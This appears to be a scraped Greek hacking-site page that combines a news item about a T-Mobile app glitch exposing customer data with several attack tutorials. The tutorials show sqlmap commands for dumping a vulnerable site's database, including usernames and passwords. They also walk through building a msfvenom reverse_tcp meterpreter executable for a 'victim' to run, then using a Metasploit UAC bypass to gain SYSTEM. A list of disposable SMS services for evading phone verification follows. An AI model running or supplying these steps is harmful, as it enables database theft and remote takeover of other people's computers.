Δυσλειτουργία της εφαρμογής της T-Mobile επιτρέπει στους χρήστες να βλέπουν τις πληροφορίες άλλων χρηστών

21 Σεπτεμβρίου 2023 by Anastasis Vasileiadis

Σήμερα, οι πελάτες της T-Mobile δήλωσαν ότι μπορούσαν να δουν τις πληροφορίες λογαριασμού και χρέωσης άλλων χρηστών μετά τη σύνδεσή τους στην επίσημη εφαρμογή κινητής τηλεφωνίας της εταιρείας. Σύμφωνα με αναφορές χρηστών στα μέσα κοινωνικής δικτύωσης, οι εκτεθειμένες πληροφορίες περιλάμβαναν ονόματα πελατών, αριθμούς τηλεφώνου, διευθύνσεις, υπόλοιπα λογαριασμών και στοιχεία πιστωτικών καρτών, όπως οι ημερομηνίες λήξης και τα τέσσερα τελευταία ψηφία.

Όπως ανέφερε για πρώτη φορά το The Verge, ορισμένοι από τους πελάτες που επηρεάστηκαν από αυτό το πρόβλημα μπορούσαν να δουν τις ευαίσθητες πληροφορίες πολλών άλλων ατόμων ενώ ήταν συνδεδεμένοι στους δικούς τους λογαριασμούς. Ενώ ένας τεράστιος αριθμός αναφορών άρχισε να εμφανίζεται νωρίτερα σήμερα στο Reddit και το Twitter, ορισμένοι πελάτες της T-Mobile ισχυρίστηκαν επίσης ότι αντιμετωπίζουν αυτό το πρόβλημα καθ’ όλη τη διάρκεια των τελευταίων δύο εβδομάδων.

“Ανέφερα αυτό το ζήτημα όταν πρωτοεμφανίστηκε εδώ στο Reddit πριν από 2 εβδομάδες και έστειλα φωτογραφίες με τις πληροφορίες των άλλων ατόμων στην ομάδα ασφαλείας τους. Καμία απάντηση, αλλά ουάου, απλά ουάου”, δήλωσε ένας πελάτης.

“Έχω αναφέρει αυτό το θέμα στους εκπροσώπους της T-Mobile στο παρελθόν, καθώς και το πρόβλημά μου με τη δρομολόγηση στη γραμμή ενεργοποίησης του μετρό όταν οι υπηρεσίες του τηλεφώνου μου αναστέλλονται”, πρόσθεσε ένας άλλος.

Η T-Mobile αναφέρει ότι το περιστατικό δεν προκλήθηκε από κυβερνοεπίθεση και ότι τα συστήματά της δεν παραβιάστηκαν.

Επίσης, παρά το σημαντικό κύμα πελατών που ανέφεραν ότι επηρεάστηκαν από αυτό το ζήτημα, η T-Mobile αναφέρει ότι το περιστατικό είχε περιορισμένο αντίκτυπο, επηρεάζοντας μόνο λιγότερα από 100 άτομα.

“Δεν υπήρξε κυβερνοεπίθεση ή παραβίαση στην T-Mobile”, δήλωσε εκπρόσωπος της εταιρίας όταν του ζητήθηκαν περισσότερες λεπτομέρειες.

“Επρόκειτο για μια προσωρινή δυσλειτουργία του συστήματος που σχετιζόταν με μια προγραμματισμένη ολονύκτια τεχνολογική ενημέρωση που αφορούσε περιορισμένες πληροφορίες λογαριασμού για λιγότερους από 100 πελάτες, η οποία επιλύθηκε γρήγορα”.

Anastasis Vasileiadis

Ο Anastasis είναι ένας από τους κορυφαίους αρθρογράφους μας, ειδικευμένος σε θέματα κυβερνοασφάλειας.

Με την εμπειρία του, παρέχει στην κοινότητα πολύτιμες γνώσεις και συμβουλές.

https://beacons.ai/cyberkid1987

cyberkid@hacks.gr

Αφήστε μια απάντηση Ακύρωση απάντησης

Πως να κάνετε μια database dump με τη χρήση του SqlMap

Πάμε να δούμε πως θα κάνουμε μια database dump με τη χρήση του Sql Map.

Κάποιες βασικές εντολές που θα χρειαστούμε.

Εκτέλεση του sqlmap –> CD C: \ python27 \ sqlmap (ανάλογα με το πού έχετε τοποθετήσει)

Εύρεση κενών ασφαλείας –> sqlmap.py -u <URL> - sqlmap.py -u <URL>

Εύρεση των βάσεων δεδομένων –> sqlmap.py -u <URL> --dbs

Αποκτήστε πρόσβαση στη βάση δεδομένων που θέλετε –> sqlmap.py -u <URL> --tables -D <όνομα βάσης δεδομένων>

Τραβήξτε τις στήλες των πινάκων –> sqlmap.py -u <URL> -columns -Τ <όνομα πίνακα>

Βρείτε τα δεδομένα απο τα tables–> sqlmap.py -u <URL> --columns -Τ <όνομα πίνακα> -C <ονόματα των στηλών> (serperate με κόμματα EG: a_username, a_password) --dump

Ας ξεκινήσουμε.

Δεν θα μπω στη διαδικασία να σας εξηγήσω πως μπορούμε να βρούμε μια σελίδα ευάλωτη σε sql injection η πως κάνουμε εγκατάσταση του Sqlmap.

1)Δίνουμε την εντολή

sqlmap.py -u vuln url

Όπου vuln url βάζουμε το δικό μας.

Αν είναι ευπαθής η σελίδα θα δείτε κάτι σαν το παρακάτω.

2)Πάμε να βρούμε την βάση δεδομένων, αυτο μπορούμε να το κάνουμε με την εντολή

sqlmap.py -u <vuln url> --dbs

Και σαν αποτέλεσμα παίρνουμε την βάση δεδομένων της σελίδας.

3)Τώρα θα πρέπει να πάρουμε πρόσβαση το οποίο είναι εύκολο! Διαγράψετε –dbs και πληκτρολογήστε –tables -D και, στη συνέχεια, τη βάση δεδομένων που θέλετε.

Τι κάναμε ακριβώς; το –tables λέει στο sqlmap οτι ψάχνουμε για πίνακες και το -D (πρέπει να είναι κεφαλαία!) λέει στο sqlmap οτι θέλουμε να ανοίξουμε αυτή τη βάση δεδομένων.

Αν όλα πάνε καλα θα πρέπει να μοιάζει με την παραπάνω εικόνα

4)Τώρα θα πρέπει να ανοίξετε τους πίνακες που βρήκε για να διαβάσουμε τα δεδομένα, usernames,passwords κλπ

Διαγράψτε το –tables και αντικαταστήστε το με –columns το οποίο ενημερώνει τον χρήστη οτι θέλουμε να ανοίξουμε τις στήλες στη συνέχεια, πληκτρολογήστε -Τ (ΚΕΦΑΛΑΙΑ!) Και, στη συνέχεια, το πίνακα που θέλετε να ανοίξετε!

Και το αποτέλεσμα

Βλέπουμε δύο πράγματα ενδιαφερων, db_username και db_password.

Για άλλη μια φορά, προσθέστε -C βάση δεδομένων, βάση δεδομένων αντικατάστασή τους με αυτά που θέλετε και, στη συνέχεια, –dump στο τέλος, αυτό λέει στο sqlmap οτι θέλουμε να έχουν πρόσβαση σε δύο από αυτές τις στήλες.

Αλέξανδρος Βυζάντιος

Hacks.gr

Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας. Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους. Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.

https://hacks.gr/

alex@hacks.gr

Bypass UAC Privilege Escalation [Metasploit]

Αρχικά ας δούμε τι είναι το UAC

Το UAC (User Account Control) είναι o έλεγχος λογαριασμού χρήστη είναι ένα προειδοποιητικό μήνυμα που μας ενημερώνει και ζητάει την επιβεβαίωση μας κάθε φορά που θέλουμε να τρέξουμε ένα αρχείο που απαιτεί δικαιώματα διαχειριστή. Μια φωτογραφία..

Ωραία αφού μάθαμε τι είναι το UAC πάμε να ξεκινήσουμε.. αρχικά θα δείξω έναν πολύ απλό τρόπο για να πάρουμε meterpreter session (access) στο θύμα μας.

Ανοίξτε το terminal και > msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TOPIKH IP MAS (IFCONFIG)] LPORT=[RANDOM PORT PX 4040] -f exe > ~/Desktop/root.exe

Αυτό για windows μηχανήματα.. μπορείτε να το ανεβάσετε στον apache για να το κατεβάσει το θύμα σας.

Ανοίγουμε το metasploit (service postgresql start + msfconsole) μπορείτε να το κάνετε και με το armitage που παρέχει γραφικό περιβάλλον.

Θα χρησιμοποιήσουμε το κλασικό multi/handler οπότε use exploit multi/handler και πατάμε enter.

Βάζουμε τα settings [show options] το payload το lhost + lport τα οποία τα βάλαμε στην δημιουργία το κακόβουλου αρχείου (με το msfvenom).

Και πατάμε exploit.. αφού τρέξει το θύμα μας το αρχείο βλέπουμε ότι έχουμε πρόσβαση μπορούμε να κάνουμε migrate σε κάποιο άλλο process.

Αν πατήσουμε getsystem θα μας έχει error.. οπότε πάμε. Πατάμε background.. το session μας .

Τώρα θα τρέξουμε το exploit use exploit/windows/local/bypassuac_injection για να κάνουμε bypass.. βάζουμε σαν setting το session [set SESSION 1] και πατάμε exploit.

Μας άνοιξε νέο session [sessions] και πατάμε getsystem και βλέπουμε.. got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Αλέξανδρος Βυζάντιος

Hacks.gr

https://hacks.gr/

alex@hacks.gr

Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Πιστεύω όλοι έχουμε πάει να κάνουμε ηλεκτρονικές αγορές, ή να φτιάξουμε λογαριασμός στα Social Media σωστά;

Πιστεύω όλοι έχουμε δει αυτό την επιλογή που λέει να προσθέσουμε τον αριθμό κινητού μας έτσι ώστε να μας στείλουν έναν κωδικό επιβεβαιώσεις σωστά;

Πάρα πολλά άτομα ξενερώνουν με την Ανωνυμία επειδή αναγκάζονται να προσθέσουν τα προσωπικά τους στοιχεία ( όπως τον αριθμό τους ).

Σήμερα θα σας δείξω έναν πολύ απλό τρόπο έτσι ώστε να κάνετε αγορές καθώς και λογαριασμούς χωρίς να προσθέτετε τα προσωπικά σας στοιχεία.

Temp-SMS

https://temp-sms.org/sms/642108797516

Αυτός ο ιστότοπος είναι πολύ παρόμοιος με το temp mail – sms, αλλά σε αυτόν τον ιστότοπο μπορείτε να πάρετε έναν αριθμό EN , υπάρχει όμως μια μικρή περίπτωση

μερική ιστότοποι να μην μπορούν να επιβεβαιώσουν τον αριθμό αυτόν οπότε πρέπει να δείτε και άλλους συνδέσμους.

7sim

https://7sim.org/free-phone-number-45MwGrzN

Αυτός ο ιστότοπος είναι ένας άλλος πολύ καλός ιστότοπος που έχω χρησιμοποιήσει και δίνει έναν πραγματικά περίεργο αριθμό όπως το 570, αλλά μπορείτε να πάρετε έναν αριθμό από το Ηνωμένο Βασίλειο ( παράδειγμα ) και να περάσετε από το yahoo και άλλους ιστότοπους με αυτό το ελεύθερο site ελέγχου sms.

http://freesmsverification.com/

k7.net – Αυτή η χρήση για δωρεάν Verifications δουλεύει τέλεια σε όλα τα site για οποιαδήποτε χώρα!

Το site αυτό έχει κατασκευαστή για να σας δώσει έναν αριθμό που ήταν σαν έναν πραγματικό αριθμό τηλεφώνου και ήταν glitchy δεδομένου ότι δεν προσφέρουν sms, αλλά θα μπορούσατε να χρησιμοποιήσετε τη φωνητική επαλήθευση επειδή με την επιβεβαίωση του αριθμού αμέσως θα πάρετε ένα φωνητικό μήνυμα και θα λάβετε τους κωδικούς επαλήθευσης σας δυστυχώς, ξεκίνησαν αυτό το site αντιμετωπίζει μερικές φορές θέματα όταν πηγαίνετε στο k7 και προσπαθήστε να πάρετε έναν αριθμό, αν το κάνετε αυτό και σας βγάλει κάποιο σφάλμα, απλά θα σας ανακατευθύνει σε εκεί νέο site που προσφέρει μόνο 800 αριθμούς.

Οι 800 αριθμοί ενδέχεται να μην δουλεύουν σχεδόν καθόλου για την επαλήθευση.

Για να περάσει την επαλήθευση των sms στο gmail παράδειγμα δοκιμάστε της παραπάνω μεθόδους που έγραψα.

Είναι μια μέθοδος που για εμένα δούλεψε, αυτό θα σας βοηθήσει στο να ξεφύγετε ακόμη και να χρειαστεί να χρησιμοποιήσετε έναν αριθμό τηλεφώνου, σας προτείνω αυτή τη μέθοδο.

Μερικά ακόμα links για δωρεάν verifications numbers:

www.burnerapp.com/
tollfreeforwarding.com/virtual-phone-number/mexico/
www.receive-sms-online.info/
tempophone.com
freephonenum.com/send-text
ru.sms24.me/number-642108343891-1
receivetxt.com/us
Textnow.com
Countrycode.org
Wp.pinger.com
Textmagic.com
Esendex.co.uk
www.receive-sms-now.com
receivesmsonline.com
receivefreesms.com
receivesmsonline.me

Good Hacking

Alexandros Vyzantios

Hacks.gr

Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας.
Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους.
Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.

http://hacks.gr

contact@hacks.gr